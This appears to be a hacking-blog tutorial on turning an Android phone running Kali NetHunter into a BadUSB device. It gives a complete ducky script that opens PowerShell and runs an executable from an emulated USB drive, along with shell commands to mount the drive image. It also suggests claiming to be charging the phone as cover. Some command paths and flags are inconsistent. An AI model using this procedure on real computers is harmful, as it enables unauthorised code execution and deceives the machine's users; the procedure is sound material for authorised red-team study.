How to Use Your Smartphone as a BadUSB Device with Kali NetHunter

By Sydney ColeHardware Hacking

Using Your Smartphone as a BadUSB Device with Kali NetHunter

Most people are familiar with the concept of BadUSB. For a long time, only devices like USB flash drives were considered BadUSB. But is it possible to use, for example, an Android smartphone for this purpose? Yes, it is—with the help of the Kali NetHunter project, a mobile platform specifically designed for penetration testers. In this article, I’ll show you how to turn your smartphone into a full-fledged “evil USB stick.”

What Is BadUSB?

BadUSB has been discussed and written about many times. Articles and videos have provided general information about this class of attacks, reviewed existing devices on the market, and described how to build homemade devices. As you may know, this attack allows you to quickly execute actions on a target computer. Here’s how it works: you insert a pre-configured flash drive or a simple USB cable with a built-in microcontroller and special firmware into a free USB port. These devices are recognized by the system as HID (Human Interface Device), such as a keyboard. Then, following a pre-written script, the device emulates keystrokes as if a real person were typing at the computer.

Suppose you’re a member of a Red Team. The advantages of such devices are obvious. First, you don’t need to sit at the computer and draw attention to yourself by typing at someone else’s workstation. It’s enough to insert an inconspicuous flash drive or cable into a USB port. Second, the speed of automatic command input with a BadUSB device is much higher than what a human can type.

In fact, the attack involving automatic text input via USB dongles appeared long before the term BadUSB itself. In 2010, the Hak5 team introduced their famous Rubber Ducky.

Rubber Ducky and Bash Bunny

The Rubber Ducky is a well-known device in certain circles. It was specifically designed for HID attacks and is not directly related to the BadUSB concept. The creators of the yellow duck developed a special scripting language for writing attack scenarios. Later, a whole resource appeared where users could share their scripts.

An interesting alternative to the Rubber Ducky is the Bash Bunny. This is a more advanced device for HID attacks. In addition to emulating a keyboard, it can emulate serial port devices, mass storage, and USB–Ethernet adapters.

For more information about other hacker devices available to anyone, check out this article.

Common Use Cases and Limitations

Most often, the Rubber Ducky and homemade BadUSB dongles are used to gain remote access or export passwords from a system. Many articles and YouTube “hackers” use the same approach: upload a trojan to a file-sharing service and program the BadUSB device to download and execute it. It’s cheap and simple.

However, there are clear downsides: first, serious professionals may use their own private tools, so uploading code to an unknown location isn’t wise. Second, the target machine may not have internet access, so the script simply won’t work as intended.

In such cases, homemade budget dongles become useless. Original Rubber Ducky users are in a better position because the device can use an SD card with enough memory. There’s also an alternative firmware called Twin Duck, which turns the duck into both a keyboard and a Mass Storage Device. This allows you to store the necessary software directly on the device and avoid using the network entirely.

Using Kali NetHunter for BadUSB Attacks

I first encountered BadUSB in a different context—when I installed Kali NetHunter on my smartphone. Among other features, this OS allows you to execute ducky scripts when the smartphone is connected to a computer. However, I wasn’t satisfied with the idea of uploading files somewhere else, so I decided to refine the attack algorithm.

WARNING: All information is provided for educational purposes only. The author and editors are not responsible for any potential harm caused by using the information in this article.

Running Ducky Scripts on NetHunter

Let’s start with the basics of running ducky scripts. NetHunter’s graphical interface has a section for this, but it’s not very useful. So, we’ll set up script execution manually.

In the /sdcard/nh_files/modules folder, there’s a utility called duckhunter.py that converts ducky scripts into shell scripts. The shell script then works with the hid-keyboard program, which interacts with the HID gadget /dev/hidg0 to emulate an input device. Here’s how the ducky command STRING usb looks in raw form:

echo u | hid-keyboard /dev/hidg0 keyboard
echo s | hid-keyboard /dev/hidg0 keyboard
echo b | hid-keyboard /dev/hidg0 keyboard

When you run the converted script, the connected phone will start typing text on the computer.

Emulating a USB Flash Drive

Now, let’s move on to emulating a flash drive. First, we need to create a virtual image that we’ll mount and use to store the files we want to launch. You could create an image with a simple command:

dd if=/dev/zero of=demo.img bs=1M count=100 && sync

But you also need to format the drive and set a volume label, so it’s easier to use the DriveDroid utility.

In DriveDroid, create an image of the required size, mount it as a removable drive, format it using standard tools, and set a label, for example, DEMOUSB. Copy the file you plan to run (let’s call it file.exe) to the root of the new flash drive.

Sample Script for Automatic Execution

Here’s my version of the demo.txt script, which will detect the drive letter of the mounted device with the required label and run a file from it:

DELAY 100
CONTROL ESCAPE
DELAY 2000
STRING powershell
DELAY 500
ENTER
DELAY 2500
STRING For ($i=0; $i -le 20; $i++) {
ENTER
STRING [string]$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label –eq 'DEMOUSB' } | select name
ENTER
STRING if($usbPath.Length -gt 7){[string]$letter = $usbPath.Substring(7,$usbPath.Length - 8)
ENTER
STRING cd $letter
ENTER
STRING ./file.exe
ENTER
STRING break}else {sleep(1)}
ENTER
STRING exit
ENTER

The code is very simple and doesn’t need comments. Convert it to shell format:

python duckhunter.py demo.txt demo.sh –l us

We’ll run the resulting .sh file from the Kali chroot environment:

chroot /data/local/nhsystem/kali-armhf sh /root/demo.sh

Now, mount your demo.img image with the following commands:

# Disable read-only
echo '0' > /config/usb_gadget/g1/functions/mass_storage.0/lun.0/ro
# Set device type
echo '1' > /config/usb_gadget/g1/functions/mass_storage.0/lun.0/removable
# Specify the path to the image to mount
echo '/sdcard/demo.img' > /config/usb_gadget/g1/functions/mass_storage.0/lun.0/file
sleep 1
# Set mass_storage property for USB
setprop sys.usb.config mass_storage,adb

You can combine all this code into a final script called badusb.sh and place it in the /data/data/com.offsec.nethunter/files directory. Then, go to NetHunter → Custom Commands and create a button to launch it with the following content:

su –c /data/data/com.offset.nethunter/files/badusb.sh

Putting It All Together

Now, just connect your phone to the computer and press the script start button—PowerShell will launch, and a loop will wait for the removable drive with the specified label and executable file to appear.

I’ve skipped some basic steps, as this BadUSB attack scenario assumes you have sufficient theoretical and practical Unix knowledge.

Why Use a Smartphone?

In my opinion, a phone handles this task better than BadUSB dongles. You can always say you’re just charging your phone from the nearest USB port, and you can keep a whole set of scripts on your phone and run any of them in any order—no need to mess with reflashing!

Final Tip

One last tip: all commands must be entered with the English keyboard layout active on the system. If, for example, Russian or any other language is set during the attack, it won’t work. You can use alternative codes entered with the Alt key and NumPad if needed.

Leave a Reply